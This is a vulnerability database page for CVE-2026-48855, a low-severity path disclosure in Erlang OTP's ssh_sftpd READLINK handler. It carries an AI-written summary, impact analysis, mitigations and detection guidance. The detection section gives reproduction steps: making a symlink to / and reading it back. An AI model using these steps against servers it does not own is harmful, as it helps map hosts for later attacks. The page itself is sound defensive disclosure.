CVE-2026-48855
Received Received - Intake
Information Disclosure in Erlang OTP SSH SFTP

Publication date: 2026-06-10

Last updated on: 2026-06-10

Assigner: EEF

Description
Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Erlang OTP ssh (ssh_sftpd module) allows File Discovery. The SSH_FXP_READLINK handler in ssh_sftpd sends the raw result of file:read_link/2 to the client without calling chroot_filename/2 to strip the backend root prefix. An authenticated SFTP client can create a symlink inside the chroot pointing to /; ssh_sftpd resolves the target to the absolute backend root and stores it on disk. Reading the symlink back via SSH_FXP_READLINK returns that absolute path, for example /data/sftp, instead of the chrooted value /. The information disclosed is the absolute filesystem path of the SFTP root directory and of any symlink targets within it. No file contents, credentials, or access to paths outside the root directory are obtainable through this issue alone. This vulnerability is associated with program files lib/ssh/src/ssh_sftpd.erl. This issue affects OTP from OTP 17.0 before 29.0.2, 28.5.0.2 and 27.3.4.13 corresponding to ssh from 3.0.1 before 6.0.1, 5.5.2.1 and 5.2.11.8.
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2026-06-10
Last Modified
2026-06-10
Generated
2026-06-10
AI Q&A
2026-06-10
EPSS Evaluated
N/A
NVD
CVE-2026-48855
EUVD
EUVD-2026-36056
Affected Vendors & Products
Showing 5 associated CPEs
Vendor Product Version / Range
erlang otp From 17.0 (inc) to 29.0.2 (exc)
erlang ssh From 3.0.1 (inc)
erlang ssh to 6.0.1 (inc)
erlang ssh to 5.5.2.1 (inc)
erlang ssh to 5.2.11.8 (inc)
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-200 The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information.
Attack-Flow Graph
AI Quick Actions
Instant insights powered by AI
Executive Summary

This vulnerability exists in the Erlang OTP ssh_sftpd module, specifically in the SSH_FXP_READLINK handler. When an authenticated SFTP client creates a symbolic link inside a chrooted directory pointing to the root directory (/), the server resolves this symlink to the absolute backend filesystem path instead of the expected chrooted path. As a result, the server discloses the absolute filesystem path of the SFTP root directory and any symlink targets within it.

Importantly, this issue only leaks path information and does not expose file contents, credentials, or allow access to paths outside the root directory.

Impact Analysis

The impact of this vulnerability is limited to the exposure of absolute filesystem paths of the SFTP root directory and symlink targets within it. This information disclosure could reveal details about the host directory structure, mount points, or usernames if the root directory is under user home directories.

While no file contents or credentials are exposed, and no direct access outside the root directory is granted, the leaked information could potentially assist attackers in planning further attacks if combined with other vulnerabilities.

The vulnerability has a low severity score (CVSS 2.3) due to its limited impact on confidentiality, integrity, and availability.

Detection Guidance

This vulnerability can be detected by testing the behavior of the SSH_FXP_READLINK handler in the Erlang OTP ssh_sftpd module when handling symbolic links inside the chrooted SFTP root directory.

An authenticated SFTP client can create a symlink inside the chroot pointing to the root directory (/), then read the symlink back using the SSH_FXP_READLINK operation. If the server returns the absolute backend filesystem path (e.g., /data/sftp) instead of the chrooted path (/), the vulnerability is present.

Suggested commands to detect this issue include using an SFTP client to:

  • Connect to the vulnerable SFTP server with valid credentials.
  • Create a symbolic link inside the chrooted SFTP root directory pointing to the root directory: ln -s / symlink_name
  • Use the SFTP client's readlink command or equivalent to read the symlink target: readlink symlink_name

If the returned path is an absolute backend path rather than the expected chrooted path, the vulnerability exists.

Mitigation Strategies

Immediate mitigation steps for this vulnerability include:

  • Apply the official patch provided by the Erlang/OTP project that fixes the ssh_sftpd module to properly canonicalize and chroot the target path before sending it to clients.
  • Upgrade Erlang OTP to a fixed version: 29.0.2, 28.5.0.2, or 27.3.4.13 or later.
  • Use OS-level chroot to isolate the SFTP server environment.
  • Restrict SFTP server access to trusted networks and users only.
  • Avoid storing sensitive information in directory paths under the SFTP root directory.
Compliance Impact

The vulnerability exposes absolute filesystem paths of the SFTP root directory and symlink targets to an authenticated client, potentially revealing host directory structure, mount points, or usernames if the root is under sensitive directories like /home.

While this information disclosure does not include file contents, credentials, or access outside the root directory, it could assist further attacks if combined with other vulnerabilities.

Such exposure of system structure information may have implications for compliance with standards like GDPR or HIPAA, which require protection of sensitive information and minimization of data exposure, especially if directory paths contain personally identifiable information or sensitive organizational data.

Mitigations such as applying patches, using OS-level chroot, restricting SFTP server access, and avoiding sensitive information in directory paths can help reduce compliance risks.

Chat Assistant
Ask questions about this CVE
Hi! I’m here to help you understand CVE-2026-48855. Ask me anything about the vulnerability, its impact, or mitigation strategies.
0/70
EPSS Chart